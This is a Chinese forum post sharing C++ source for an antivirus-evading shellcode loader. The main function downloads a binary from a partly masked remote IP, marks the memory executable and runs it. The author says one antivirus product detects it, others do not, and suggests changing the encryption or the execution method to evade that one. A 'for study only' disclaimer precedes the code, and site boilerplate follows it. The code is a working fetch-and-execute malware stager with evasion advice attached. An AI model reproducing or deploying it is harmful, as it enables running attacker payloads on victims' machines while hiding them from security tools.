|
原理:
加密URL 加密shellcode
解密URL 打开指定URL下载的bin二进制文件
读取bin中的数据,进行加密
申请一块内存,解密数据复制到内存中
执行内存中的shellcode
释放内存
(大概就是这些,刚做出来的时候,用了一个星期。360已经特征杀了,其他杀毒一直没报。很稳定,要过360的自己改改加密或者改改内存执行方式就可以过)
请勿用与非法活动!这个代码只仅供参考学习价值!否则后果自负!
免杀加载器C++代码源码
换成o
#include <Windows.h>
#include <WinINet.h>
#include <iostream>
#include <string>
#include <Shlwapi.h>
#include <bcrypt.h>
#include <wincrypt.h>
#include <vector>
#include <sstream>
#include <iomanip>
#include <ntstatus.h>
#pragma comment(lib, "Wininet.lib")
#pragma comment(lib, "Shlwapi.lib")
#pragma comment(lib, "Bcrypt.lib")
#ifndef STATUS_SUCCESS
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
#endif
// Base64编码
std::string base64_encode(const std::vector<BYTE>& data) {
static const char base64_chars[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
std::string ret;
int i = 0, j = 0;
BYTE char_array_3[3], char_array_4[4];
for (auto byte : data) {
char_array_3[i++] = byte;
if (i == 3) {
char_array_4[0] = (char_array_3[0] & 0xfc) >> 2;
char_array_4[1] = ((char_array_3[0] & 0x03) << 4) + ((char_array_3[1] & 0xf0) >> 4);
char_array_4[2] = ((char_array_3[1] & 0x0f) << 2) + ((char_array_3[2] & 0xc0) >> 6);
char_array_4[3] = char_array_3[2] & 0x3f;
for (i = 0; i < 4; i++) {
ret += base64_chars[char_array_4[i]];
}
i = 0;
}
}
if (i) {
for (j = i; j < 3; j++) {
char_array_3[j] = '\0';
}
char_array_4[0] = (char_array_3[0] & 0xfc) >> 2;
char_array_4[1] = ((char_array_3[0] & 0x03) << 4) + ((char_array_3[1] & 0xf0) >> 4);
char_array_4[2] = ((char_array_3[1] & 0x0f) << 2) + ((char_array_3[2] & 0xc0) >> 6);
char_array_4[3] = char_array_3[2] & 0x3f;
for (j = 0; j < i + 1; j++) {
ret += base64_chars[char_array_4[j]];
}
while (i++ < 3) {
ret += '=';
}
}
return ret;
}
std::string url_encode(const std::string& str) {
std:stringstream escaped;
escaped.fill('0');
escaped << std::hex;
for (auto c : str) {
if (std::isalnum(c) || c == '-' || c == '_' || c == '.' || c == '~') {
escaped << c;
}
else {
escaped << std::uppercase;
escaped << '%' << std::setw(2) << int((unsigned char)c);
escaped << std::nouppercase;
}
}
return escaped.str();
}
std::string encrypt_url(const std::string& url) {
std::string param = "param=123456";
std::vector<BYTE> data(param.begin(), param.end());
BCRYPT_ALG_HANDLE hAlg = NULL;
if (BCryptOpenAlgorithmProvider(&hAlg, BCRYPT_RNG_ALGORITHM, NULL, 0) != STATUS_SUCCESS) {
return "";
}
BYTE key[16] = { 0 };
if (BCryptGenRandom(hAlg, key, sizeof(key), 0) != STATUS_SUCCESS) {
BCryptCloseAlgorithmProvider(hAlg, 0);
return "";
}
BCryptCloseAlgorithmProvider(hAlg, 0);
BCRYPT_KEY_HANDLE hKey = NULL;
if (BCryptOpenAlgorithmProvider(&hAlg, BCRYPT_AES_ALGORITHM, NULL, 0) != STATUS_SUCCESS) {
return "";
}
ULONG cbKeyObject = 0, cbData = 0, cbBlockLen = 0;
if (BCryptGetProperty(hAlg, BCRYPT_OBJECT_LENGTH, (PBYTE)&cbKeyObject, sizeof(ULONG), &cbData, 0) != STATUS_SUCCESS) {
BCryptCloseAlgorithmProvider(hAlg, 0);
return "";
}
if (BCryptGetProperty(hAlg, BCRYPT_BLOCK_LENGTH, (PBYTE)&cbBlockLen, sizeof(ULONG), &cbData, 0) != STATUS_SUCCESS) {
BCryptCloseAlgorithmProvider(hAlg, 0);
return "";
}
BYTE* pbKeyObject = new BYTE[cbKeyObject];
if (BCryptGenerateSymmetricKey(hAlg, &hKey, pbKeyObject, cbKeyObject, key, sizeof(key), 0) != STATUS_SUCCESS) {
delete[] pbKeyObject;
BCryptCloseAlgorithmProvider(hAlg, 0);
return "";
}
delete[] pbKeyObject;
// 填充数据
size_t padding = cbBlockLen - (data.size() % cbBlockLen);
if (padding > 0) {
data.resize(data.size() + padding, (BYTE)padding);
}
// 加密数据
ULONG cbCipherText = (ULONG)data.size() + cbBlockLen;
BYTE* pbCipherText = new BYTE[cbCipherText];
memset(pbCipherText, 0, cbCipherText);
if (BCryptEncrypt(hKey, data.data(), (ULONG)data.size(), NULL, NULL, 0, pbCipherText, cbCipherText, &cbData, 0) != STATUS_SUCCESS) {
delete[] pbCipherText;
BCryptDestroyKey(hKey);
BCryptCloseAlgorithmProvider(hAlg, 0);
return "";
}
BCryptDestroyKey(hKey);
BCryptCloseAlgorithmProvider(hAlg, 0);
// 将密钥和密文进行Base64编码和URL编码
std::string encoded_key = base64_encode(std::vector<BYTE>(key, key + sizeof(key)));
std::string encoded_data = base64_encode(std::vector<BYTE>(pbCipherText, pbCipherText + cbData));
std::string encoded_url = url + "?" + param.substr(0, param.find("=") + 1) + url_encode(encoded_data) + "&key=" + url_encode(encoded_key);
// 清理内存
delete[] pbCipherText;
return encoded_url;
}
int main() {
std::wstring url = L"http://xxx.92.32.137/Client.bin";
HINTERNET hInternet = InternetOpenW(L"Download", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
if (hInternet == NULL) {
std::cout << "Failed to initialize WinINet." << std::endl;
return 1;
}
HINTERNET hUrl = InternetOpenUrlW(hInternet, url.c_str(), NULL, 0, INTERNET_FLAG_RELOAD | INTERNET_FLAG_PRAGMA_NOCACHE | INTERNET_FLAG_NO_CACHE_WRITE, 0);
if (hUrl == NULL) {
std::cout << "Failed to open URL." << std::endl;
InternetCloseHandle(hInternet);
return 1;
}
DWORD file_size = 0;
DWORD length = sizeof(file_size);
if (!HttpQueryInfoW(hUrl, HTTP_QUERY_CONTENT_LENGTH | HTTP_QUERY_FLAG_NUMBER, &file_size, &length, NULL)) {
std::cout << "Failed to get file size." << std::endl;
InternetCloseHandle(hUrl);
InternetCloseHandle(hInternet);
return 1;
}
LPVOID lpAddress = VirtualAlloc(NULL, file_size, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
if (lpAddress == NULL) {
std::cout << "Failed to allocate memory." << std::endl;
InternetCloseHandle(hUrl);
InternetCloseHandle(hInternet);
return 1;
}
DWORD bytes_read = 0;
if (!InternetReadFile(hUrl, lpAddress, file_size, &bytes_read)) {
std::cout << "Failed to read file." << std::endl;
VirtualFree(lpAddress, 0, MEM_RELEASE);
InternetCloseHandle(hUrl);
InternetCloseHandle(hInternet);
return 1;
}
InternetCloseHandle(hUrl);
InternetCloseHandle(hInternet);
// 通过VirtualProtect将内存页属性设置为可执行
DWORD old_protect = 0;
if (!VirtualProtect(lpAddress, file_size, PAGE_EXECUTE_READ, &old_protect)) {
std::cout << "Failed to set memory page protection." << std::endl;
VirtualFree(lpAddress, 0, MEM_RELEASE);
return 1;
}
// 执行内存中的代码
((void(*)())lpAddress)();
// 释放内存
VirtualFree(lpAddress, 0, MEM_RELEASE);
return 0;
}
|
温馨提示:
1、在论坛里发表的文章仅代表作者本人的观点,与本网站立场无关。
2、论坛的所有内容都不保证其准确性,有效性,时间性。阅读本站内容因误导等因素而造成的损失本站不承担连带责任。
3、当政府机关依照法定程序要求披露信息时,论坛均得免责。
4、若因线路及非本站所能控制范围的故障导致暂停服务期间造成的一切不便与损失,论坛不负任何责任。
5、注册会员通过任何手段和方法针对论坛进行破坏,我们有权对其行为作出处理。并保留进一步追究其责任的权利。
----------------------------------------------------------------------------------------------------------------------------
文章采用: 《 署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0)》许可协议授权。
版权声明:未标注转载均为本站原创,转载时请以链接形式注明文章出处。如有侵权、不妥之处,请联系站长删除。敬请谅解!
|